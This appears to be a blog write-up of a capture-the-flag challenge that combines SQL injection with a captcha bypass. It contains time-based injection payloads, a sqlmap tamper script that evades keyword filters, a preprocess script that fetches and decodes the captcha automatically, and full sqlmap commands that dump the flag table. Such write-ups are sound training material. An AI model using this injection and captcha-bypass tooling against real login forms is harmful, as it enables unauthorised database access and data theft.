Exploit SQL Injection and bypass captcha with SQLMAP

Kenzy challenge (Cyber wargames 2022)

SQL Injection + Captcha bypass

Steps to solve this challenge

  1. Detect SQL Injection
{"Username":"admin","status":"Invalid username or password"}
{"Username":"admin'","status":"statement error"}
{"Username":"admin","status":"Invalid username or password"}
admin'or sleep(5) --
admin'sleep(5)--
admin'oorr/**/sleep(5)#

2. secound part => Captcha bypass

Inspect element to view src code, and I found the path of captcha.

Notic:

Scripting part

I chose to solve the challenge using SQLMap and tamper script to bypass filters and captcha using preprocess

from lib.core.enums import PRIORITY
import re
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
retVal = payload
if payload:
retVal = re.sub(r"(?i)(or)", 'oorr', retVal)
retVal = re.sub(r"(?i)(and)", 'anandd', retVal)
return retVal
import requests,re,base64
import urllib.parse
def solve_captcha():
try:
cookies = {'PHPSESSID': 'dvtd7c1gss3oldmp4obam7hu6p'}
response = requests.get("http://34.175.249.72:60001/scripts/captcha.php",cookies=cookies ,verify=False)
except Exception as e:
print(e)
fetch_captcha = re.findall(r"CAPTCHA.*", response.text)[0][10:-1]
return fetch_captcha
def preprocess(req):
captcha = solve_captcha()
captcha = base64.b64decode(base64.b64decode(captcha).decode('utf-8')).decode('utf-8')
if req.data:
req.data += b'&captcha='+captcha.encode("utf-8")
python3 /usr/bin/sqlmap -r req-sqli.txt --banner --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py -p username --preprocess solve-captcha-preprocess.py  --technique=B --not-string="statement error" --level=2
--banner : Retrieve DBMS banner
--prefix : Injection payload starting
--suffix : Injection payload ending
--batch : Never ask for user input, use the default behavior
--tamper : Use given script(s) for tampering injection data
--preprocess: Use given script(s) for preprocessing (request)
--technique: SQL injection techniques to use
--not-string: String to match when query is evaluated to False
--level: Level of tests to perform (1-5)
-p : Testable parameter
python3 /usr/bin/sqlmap -r req-sqli.txt -dbms MySQL -D kenzy -T solve -C flag --dump --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py --proxy="http://127.0.0.1:8080" -p username --preprocess solve-captcha-preprocess.py --flush-session --technique=B --not-string="statement error" --level=2

--

--

Cyber Security Engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store